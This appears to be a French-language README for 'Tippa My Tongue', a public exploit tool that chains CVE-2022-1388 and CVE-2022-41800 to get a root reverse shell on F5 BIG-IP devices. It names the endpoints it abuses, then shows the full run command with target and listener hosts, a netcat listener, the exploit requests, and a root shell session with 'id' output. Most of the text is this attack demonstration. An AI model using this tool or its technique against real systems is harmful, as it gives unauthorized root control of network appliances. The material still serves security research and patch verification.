
Exploit F5 BIG-IP utilisant CVE-2022-1388 et CVE-2022-41800
Tippa My Tongue est un exploit qui utilise CVE-2022-1388 et CVE-2022-41800 pour établir un shell inversé root sur les produits F5 BIG-IP. La plupart des exploits de CVE-2022-1388 obtiennent l'exécution de code via /mgmt/tm/util/bash. Cependant, cet exploit utilise /mgmt/shared/iapp/rpm-spec-creator, suivi de /mgmt/shared/iapp/build-package. Cette approche a été suggérée pour la première fois par Ron Bowes dans cette analyse d'AttackerKB. Bien qu'à ma connaissance, personne n'ait jamais publié un exploit CVE-2022-1388 qui fasse exactement cela.
Pour plus de détails, lisez l'article de VulnCheck.
albinolobster@mournland:~/tippa-my-tongue$ python3 tippa-my-tongue.py --rhost 10.9.49.191 --lhost 10.9.49.194
▄▄▄▄▄▪ ▄▄▄· ▄▄▄· ▄▄▄· • ▌ ▄ ·. ▄· ▄
•██ ██ ▐█ ▄█▐█ ▄█▐█ ▀█ ·██ ▐███▪▐█▪██
▐█.▪▐█· ██▀· ██▀·▄█▀▀█ ▐█ ▌▐▌▐█·▐█▌▐█▪
▐█▌·▐█▌▐█▪·•▐█▪·•▐█ ▪▐▌ ██ ██▌▐█▌ ▐█▀·.
▀▀▀ ▀▀▀.▀ .▀ ▀ ▀ ▀▀ █▪▀▀▀ ▀ •
▄▄▄▄▄ ▐ ▄ ▄▄ • ▄• ▄▌▄▄▄ .
•██ ▪ •█▌▐█▐█ ▀ ▪█▪██▌▀▄.▀·
▐█.▪ ▄█▀▄ ▐█▐▐▌▄█ ▀█▄█▌▐█▌▐▀▀▪▄
▐█▌·▐█▌.▐▌██▐█▌▐█▄▪▐█▐█▄█▌▐█▄▄▌
▀▀▀ ▀█▄▀▪▀▀ █▪·▀▀▀▀ ▀▀▀ ▀▀▀
CVE-2022-1388
CVE-2022-41800
🦞
[+] Exécution de l'écouteur netcat
[+] Utilisation de /usr/bin/nc
Écoute sur 0.0.0.0 1270
[+] Envoi de la requête initiale vers rpm-spec-creator
[+] Envoi de la tentative d'exploit vers build-package
Connexion reçue sur 10.9.49.191 47152
bash: pas de contrôle de tâche dans ce shell
[@localhost:NO LICENSE:Standalone] BUILD # pwd
pwd
/var/config/rest/node/tmp/BUILD
[@localhost:NO LICENSE:Standalone] BUILD # id
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
[@localhost:NO LICENSE:Standalone] BUILD #